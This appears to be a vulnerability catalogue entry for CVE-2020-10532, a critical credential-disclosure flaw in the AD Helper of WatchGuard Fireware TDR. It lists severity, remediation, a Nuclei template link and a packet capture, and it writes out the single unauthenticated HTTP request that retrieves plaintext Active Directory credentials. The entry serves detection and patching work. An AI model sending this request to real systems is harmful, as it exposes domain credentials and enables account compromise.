🔙 목록으로 돌아가기

CVE-2020-10532: WatchGuard Fireware AD Helper Component - Credentials Disclosure

TitleWatchGuard Fireware AD Helper Component - Credentials Disclosure
Authorgy741
SeverityCritical
ImpactRemote attackers can retrieve cleartext passwords, leading to potential account compromise and further system exploitation.
RemediationUpdate to version 5.8.5.10317 or later.
CVSS Score10
EPSS Score0.00317
CVE IDCVE-2020-10532
CWE IDCWE-288
Tags cve cve2020 watchguard disclosure edb vuln

🔍 Vulnerability Description

WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.

🌐 HTTP Request

GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10532.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-10532.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A